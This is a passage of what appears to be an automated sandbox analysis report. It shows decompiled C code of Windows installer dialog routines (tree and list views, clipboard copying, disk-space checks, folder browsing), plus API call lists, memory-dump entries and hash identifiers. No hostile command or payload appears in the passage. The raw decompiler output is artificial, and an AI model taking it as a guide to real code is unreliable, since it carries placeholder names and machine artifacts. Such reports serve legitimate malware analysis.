				_v36 = _v36 | 0xffffffff;
				_v56 = 2;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x7a2f88;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x7a2750 = GetDlgItem(_a4, 0x403);
				 *0x7a2748 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x7a2764 = _t127;
				_v8 = _t127;
				E00403DDC( *0x7a2750);
				 *0x7a2754 = E004045FA(4);
				 *0x7a276c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t148) {
					SendMessageA(_v8, 0x1024, _t148, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403DA7(_a4);
				if(( *0x7a2f90 & 0x00000003) != 0) {
					ShowWindow( *0x7a2750, _t148);
					if(( *0x7a2f90 & 0x00000002) != 0) {
						 *0x7a2750 = _t148;
					} else {
						ShowWindow(_v8, 8);
					}
				}
				_t157 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t157, 0x401, _t148, 0x75300000);
				if(( *0x7a2f90 & 0x00000004) != 0) {
					SendMessageA(_t157, 0x409, _t148, _a12);
					SendMessageA(_t157, 0x2001, _t148, _a8);
				}
				goto L36;
			}
































            0x00404ea9
            0x00404eaf
            0x00404eb8
            0x00404ebb
            0x00405048
            0x0040506c
            0x0040506c
            0x0040507f
            0x0040509c
            0x004050a3
            0x004050fa
            0x004050fe
            0x00000000
            0x00405105
            0x0040510d
            0x00405115
            0x00405118
            0x00405215
            0x00000000
            0x00405215
            0x0040511e
            0x00405124
            0x00405126
            0x00405127
            0x00405133
            0x00405139
            0x0040513f
            0x00405154
            0x0040515a
            0x00405141
            0x00405146
            0x0040514c
            0x0040514f
            0x0040514f
            0x00405168
            0x00405170
            0x00405173
            0x0040517c
            0x0040517f
            0x00405186
            0x0040518d
            0x00405195
            0x00405195
            0x004051ac
            0x004051ac
            0x004051b3
            0x004051b9
            0x004051c2
            0x004051c9
            0x004051d2
            0x004051d4
            0x004051d7
            0x004051e0
            0x004051ec
            0x004051ee
            0x004051f4
            0x004051f5
            0x004051f6
            0x004051fe
            0x00405209
            0x0040520f
            0x0040520f
            0x00000000
            0x00405173
            0x004050fe
            0x004050ab
            0x004050db
            0x004050e3
            0x004050ee
            0x004050ee
            0x004050f5
            0x00000000
            0x004050f5
            0x004050af
            0x004050b9
            0x00000000
            0x00405081
            0x00405087
            0x004050be
            0x00000000
            0x004050c7
            0x00405090
            0x00405095
            0x00405097
            0x00000000
            0x00405097
            0x0040507f
            0x00404ec1
            0x00404ec5
            0x00404ece
            0x00404ed5
            0x00404ed8
            0x00404edb
            0x00404ede
            0x00404edf
            0x00404ee0
            0x00404ef9
            0x00404efc
            0x00404f06
            0x00404f15
            0x00404f1d
            0x00404f25
            0x00404f2a
            0x00404f2d
            0x00404f39
            0x00404f42
            0x00404f4b
            0x00404f6e
            0x00404f74
            0x00404f85
            0x00404f8a
            0x00404f98
            0x00404fa6
            0x00404fa6
            0x00404fab
            0x00404fb9
            0x00404fb9
            0x00404fbe
            0x00404fc1
            0x00404fc6
            0x00404fd2
            0x00404fdb
            0x00404fe8
            0x00404ff7
            0x00404fea
            0x00404fef
            0x00404fef
            0x00404fe8
            0x0040500c
            0x00405015
            0x0040501e
            0x0040502e
            0x0040503a
            0x0040503a
            0x00000000

            APIs
            • GetDlgItem.USER32 ref: 00404EFF
            • GetDlgItem.USER32 ref: 00404F0E
            • GetDlgItem.USER32 ref: 00404F1D
              • Part of subcall function 00403DDC: SendMessageA.USER32(00000028,?,00000001,00403C0F), ref: 00403DEA
            • GetClientRect.USER32 ref: 00404F4B
            • GetSystemMetrics.USER32 ref: 00404F53
            • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F74
            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F85
            • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404F98
            • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404FA6
            • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FB9
            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404FDB
            • ShowWindow.USER32(?,00000008), ref: 00404FEF
            • GetDlgItem.USER32 ref: 00405005
            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405015
            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040502E
            • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 0040503A
            • GetDlgItem.USER32 ref: 00405057
            • CreateThread.KERNEL32(00000000,00000000,Function_00004E34,00000000), ref: 00405065
            • CloseHandle.KERNEL32(00000000), ref: 0040506C
            • ShowWindow.USER32(00000000), ref: 00405090
            • ShowWindow.USER32(?,00000008), ref: 00405095
            • ShowWindow.USER32(00000008), ref: 004050DB
            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040510D
            • CreatePopupMenu.USER32 ref: 0040511E
            • AppendMenuA.USER32 ref: 00405133
            • GetWindowRect.USER32 ref: 00405146
            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405168
            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051A3
            • OpenClipboard.USER32(00000000), ref: 004051B3
            • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004051B9
            • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051C2
            • GlobalLock.KERNEL32 ref: 004051CC
            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051E0
            • lstrlenA.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004051E7
            • GlobalUnlock.KERNEL32(00000000,00000000,?,?,00000000,?,00000000), ref: 004051FE
            • SetClipboardData.USER32 ref: 00405209
            • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 0040520F
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrlen
            • String ID: {
            • API String ID: 1050754034-366298937
            • Opcode ID: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
            • Instruction ID: 09b722d0185256cc624264d40bb0edb6627bdfa233c056c1d5ba82df3b217a72
            • Opcode Fuzzy Hash: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
            • Instruction Fuzzy Hash: 0FA14B70900208FFDB11AF64DD89AAE7F79FB48354F10812AFA05BA1A1C7785E41DF69
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004046A7, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 477windowmemoryCOMMONCrypto
            Download Yara Rule
            C-Code - Quality: 93%
            			E004046A7(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				struct HBITMAP__* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				void* _t252;
				intOrPtr _t258;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x7a2fa8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x7a2f88 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x7a2f91 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404627(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x7a2f90) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x79f564;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x79f578;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x79f564 = _t315;
								 *0x79f578 = _t315;
								 *0x7a2fe0 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x7a2f91 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E00401410(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x79f578;
									_t196 =  *0x7a2fa8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x7a2fac <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x7a275c + 0x10)) != _t315) {
											E00404545(0x3ff, 0xfffffffb, E004045FA(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x7a2fac);
									goto L84;
								} else {
									_t282 = E004012E2( *0x79f578);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x7a2fe0 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x79f578 = GlobalAlloc(0x40,  *0x7a2fac << 2);
					_v24 = LoadBitmapA( *0x7a2f80, 0x6e);
					 *0x79f574 = SetWindowLongA(_v8, 0xfffffffc, E00404CA1);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x79f564 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x79f564);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if(_t258 != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							_push(_t258);
							_push(_t315);
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E004059E1(_t286, _t315, _t320)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403DA7(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403DA7(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x7a2fac <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x79f578 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x79f578 + _t318 * 4) = _t274;
									_t288 =  *( *0x79f578 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x7a2fac);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403DDC(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403DDC(_v12);
								L89:
								return E00403E0E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































            0x004046c5
            0x004046cb
            0x004046cd
            0x004046d3
            0x004046d9
            0x004046e6
            0x004046ef
            0x004046f2
            0x004046f5
            0x00404916
            0x0040491d
            0x00404931
            0x0040491f
            0x00404921
            0x00404924
            0x00404925
            0x0040492c
            0x0040492c
            0x0040493d
            0x0040494b
            0x0040494e
            0x00404964
            0x004049dc
            0x004049df
            0x004049e1
            0x004049eb
            0x004049f9
            0x004049f9
            0x004049fb
            0x00404a05
            0x00404a0b
            0x00404a2c
            0x00404a0d
            0x00404a1a
            0x00404a1a
            0x00404a0b
            0x00404a05
            0x00000000
            0x004049df
            0x00404969
            0x00404974
            0x00404979
            0x00404980
            0x00404987
            0x00404991
            0x00404991
            0x00404995
            0x0040499a
            0x0040499f
            0x004049b5
            0x004049a1
            0x004049a1
            0x004049a9
            0x004049b0
            0x004049ab
            0x004049ab
            0x004049ab
            0x004049a9
            0x004049b9
            0x004049bb
            0x004049c9
            0x004049ca
            0x004049d6
            0x004049d9
            0x004049d9
            0x0040499a
            0x00000000
            0x00404987
            0x0040496b
            0x00404972
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00404a2f
            0x00404a2f
            0x00404a36
            0x00404aaa
            0x00404ab1
            0x00404abd
            0x00404abd
            0x00404ac6
            0x00404ac8
            0x00404acf
            0x00404ad2
            0x00404ad2
            0x00404ad8
            0x00404adf
            0x00404ae2
            0x00404ae2
            0x00404ae8
            0x00404aee
            0x00404af4
            0x00404af4
            0x00404b01
            0x00404c4e
            0x00404c55
            0x00404c72
            0x00404c78
            0x00404c8a
            0x00404c8a
            0x00000000
            0x00404b07
            0x00404b09
            0x00404b11
            0x00404b15
            0x00404b15
            0x00404b1d
            0x00404b5e
            0x00404b60
            0x00404b70
            0x00404b73
            0x00404b78
            0x00404b7f
            0x00404b82
            0x00404c24
            0x00404c2a
            0x00404c38
            0x00404c49
            0x00404c49
            0x00000000
            0x00404c38
            0x00404b88
            0x00404b8b
            0x00404b91
            0x00404b96
            0x00404b98
            0x00404b9a
            0x00404ba0
            0x00404ba7
            0x00404bac
            0x00404bb3
            0x00404bb6
            0x00404bb6
            0x00404bbd
            0x00404bc9
            0x00404bcd
            0x00404bcf
            0x00404bcf
            0x00404bbf
            0x00404bc1
            0x00404bc1
            0x00404bef
            0x00404bfb
            0x00404c0a
            0x00404c0a
            0x00404c0c
            0x00404c0f
            0x00404c18
            0x00000000
            0x00404b1f
            0x00404b2a
            0x00404b2d
            0x00404b32
            0x00404b34
            0x00404b38
            0x00404b48
            0x00404b52
            0x00404b54
            0x00404b57
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00404b3a
            0x00404b3a
            0x00404b40
            0x00404b42
            0x00404b42
            0x00404b43
            0x00404b44
            0x00000000
            0x00404b3a
            0x00404b1d
            0x00404b01
            0x00404a3e
            0x00000000
            0x00404a54
            0x00404a5e
            0x00404a63
            0x00000000
            0x00000000
            0x00404a75
            0x00404a7a
            0x00404a86
            0x00404a86
            0x00404a88
            0x00404a97
            0x00404a99
            0x00404aa0
            0x00404aa3
            0x00000000
            0x00404aa3
            0x00404a3e
            0x004046fb
            0x00404700
            0x0040470a
            0x0040470b
            0x00404714
            0x0040471f
            0x0040473a
            0x0040474c
            0x00404751
            0x0040475c
            0x00404765
            0x0040477a
            0x0040478b
            0x00404798
            0x00404798
            0x0040479d
            0x004047a3
            0x004047a5
            0x004047a8
            0x004047ad
            0x004047b2
            0x004047b4
            0x004047b4
            0x004047b7
            0x004047b8
            0x004047d4
            0x004047d4
            0x004047d6
            0x004047d7
            0x004047dc
            0x004047df
            0x004047e2
            0x004047e6
            0x004047eb
            0x004047f0
            0x004047f4
            0x004047f9
            0x004047fe
            0x00404800
            0x00404808
            0x004048d2
            0x004048e5
            0x00000000
            0x0040480e
            0x00404811
            0x00404814
            0x00404817
            0x00404817
            0x0040481d
            0x00404823
            0x00404826
            0x0040482c
            0x0040482d
            0x00404832
            0x0040483b
            0x00404842
            0x00404845
            0x00404848
            0x0040484b
            0x00404887
            0x004048b0
            0x00404889
            0x00404896
            0x00404896
            0x0040484d
            0x00404850
            0x0040485f
            0x00404869
            0x00404871
            0x00404878
            0x00404880
            0x00404880
            0x0040484b
            0x004048b6
            0x004048b7
            0x004048c3
            0x004048c3
            0x004048d0
            0x004048eb
            0x004048ef
            0x0040490c
            0x00404911
            0x00404914
            0x00000000
            0x004048f1
            0x004048f6
            0x004048ff
            0x00404c8c
            0x00404c9e
            0x00404c9e
            0x004048ef
            0x00000000
            0x004048d0
            0x00404808

            APIs
            • GetDlgItem.USER32 ref: 004046BE
            • GetDlgItem.USER32 ref: 004046CB
            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404717
            • LoadBitmapA.USER32 ref: 0040472A
            • SetWindowLongA.USER32 ref: 0040473D
            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404751
            • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404765
            • SendMessageA.USER32(?,00001109,00000002), ref: 0040477A
            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404786
            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404798
            • DeleteObject.GDI32(?), ref: 0040479D
            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047C8
            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047D4
            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404869
            • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404894
            • SendMessageA.USER32(?,00001100,00000000,?), ref: 004048A8
            • GetWindowLongA.USER32 ref: 004048D7
            • SetWindowLongA.USER32 ref: 004048E5
            • ShowWindow.USER32(?,00000005), ref: 004048F6
            • SendMessageA.USER32(?,00000419,00000000,?), ref: 004049F9
            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A5E
            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A73
            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404A97
            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404ABD
            • ImageList_Destroy.COMCTL32(?), ref: 00404AD2
            • GlobalFree.KERNEL32 ref: 00404AE2
            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B52
            • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404BFB
            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C0A
            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C2A
            • ShowWindow.USER32(?,00000000), ref: 00404C78
            • GetDlgItem.USER32 ref: 00404C83
            • ShowWindow.USER32(00000000), ref: 00404C8A
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
            • String ID: $M$N
            • API String ID: 1638840714-813528018
            • Opcode ID: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
            • Instruction ID: 9804f70a80ad740571f010f4d41a056d70bc73ca34169b501aedef0055c070ba
            • Opcode Fuzzy Hash: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
            • Instruction Fuzzy Hash: 3C029EB0D00208EFEB10DF64CD45AAE7BB5EB84315F10817AF610BA2E1C7799A52CF58
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004041E5, Relevance: 26.5, APIs: 9, Strings: 6, Instructions: 242stringCOMMON
            Download Yara Rule
            C-Code - Quality: 68%
            			E004041E5(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr* _t81;
				int _t86;
				int _t88;
				int _t100;
				signed int _t105;
				char* _t110;
				intOrPtr _t114;
				intOrPtr* _t128;
				signed int _t140;
				signed int _t145;
				CHAR* _t151;

				_t75 =  *0x79ed58;
				_v36 = _t75;
				_t151 = ( *(_t75 + 0x3c) << 0xa) + 0x7a4000;
				_v12 =  *((intOrPtr*)(_t75 + 0x38));
				if(_a8 == 0x40b) {
					E004052A3(0x3fb, _t151);
					E00405BFB(_t151);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L19:
						if(_a8 == 0x40f) {
							L21:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							_t145 = _t144 | 0xffffffff;
							E004052A3(0x3fb, _t151);
							if(E004055AC(_t169, _t151) == 0) {
								_v8 = 1;
							}
							E004059BF(0x79e550, _t151);
							_t80 = E0040555F(0x79e550);
							if(_t80 != 0) {
								 *_t80 =  *_t80 & 0x00000000;
							}
							_t81 = E00405CD2("KERNEL32.dll", "GetDiskFreeSpaceExA");
							if(_t81 == 0) {
								L28:
								_t86 = GetDiskFreeSpaceA(0x79e550,  &_v20,  &_v28,  &_v16,  &_v40);
								__eflags = _t86;
								if(_t86 == 0) {
									goto L31;
								}
								_t100 = _v20 * _v28;
								__eflags = _t100;
								_t145 = MulDiv(_t100, _v16, 0x400);
								goto L30;
							} else {
								_push( &_v32);
								_push( &_v24);
								_push( &_v44);
								_push(0x79e550);
								if( *_t81() == 0) {
									goto L28;
								}
								_t145 = (_v40 << 0x00000020 | _v44) >> 0xa;
								L30:
								_v12 = 1;
								L31:
								if(_t145 < E004045FA(5)) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x7a275c + 0x10)) != 0) {
									E00404545(0x3ff, 0xfffffffb, _t87);
									if(_v12 == 0) {
										SetDlgItemTextA(_a4, 0x400, 0x79e540);
									} else {
										E00404545(0x400, 0xfffffffc, _t145);
									}
								}
								_t88 = _v8;
								 *0x7a3024 = _t88;
								if(_t88 == 0) {
									_v8 = E00401410(7);
								}
								if(( *(_v36 + 0x14) & 0x00000400) != 0) {
									_v8 = 0;
								}
								E00403DC9(0 | _v8 == 0x00000000);
								if(_v8 == 0 &&  *0x79f570 == 0) {
									E0040417A();
								}
								 *0x79f570 = 0;
								goto L45;
							}
						}
						_t169 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L45;
						}
						goto L21;
					}
					_t105 = _a12 & 0x0000ffff;
					if(_t105 != 0x3fb) {
						L12:
						if(_t105 == 0x3e9) {
							_t140 = 7;
							memset( &_v72, 0, _t140 << 2);
							_t144 = 0x79f580;
							_v76 = _a4;
							_v68 = 0x79f580;
							_v56 = E004044DF;
							_v52 = _t151;
							_v64 = E004059E1(0x3fb, 0x79f580, _t151);
							_t110 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t110, 0x79e958, _v12);
							if(_t110 == 0) {
								_a8 = 0x40f;
							} else {
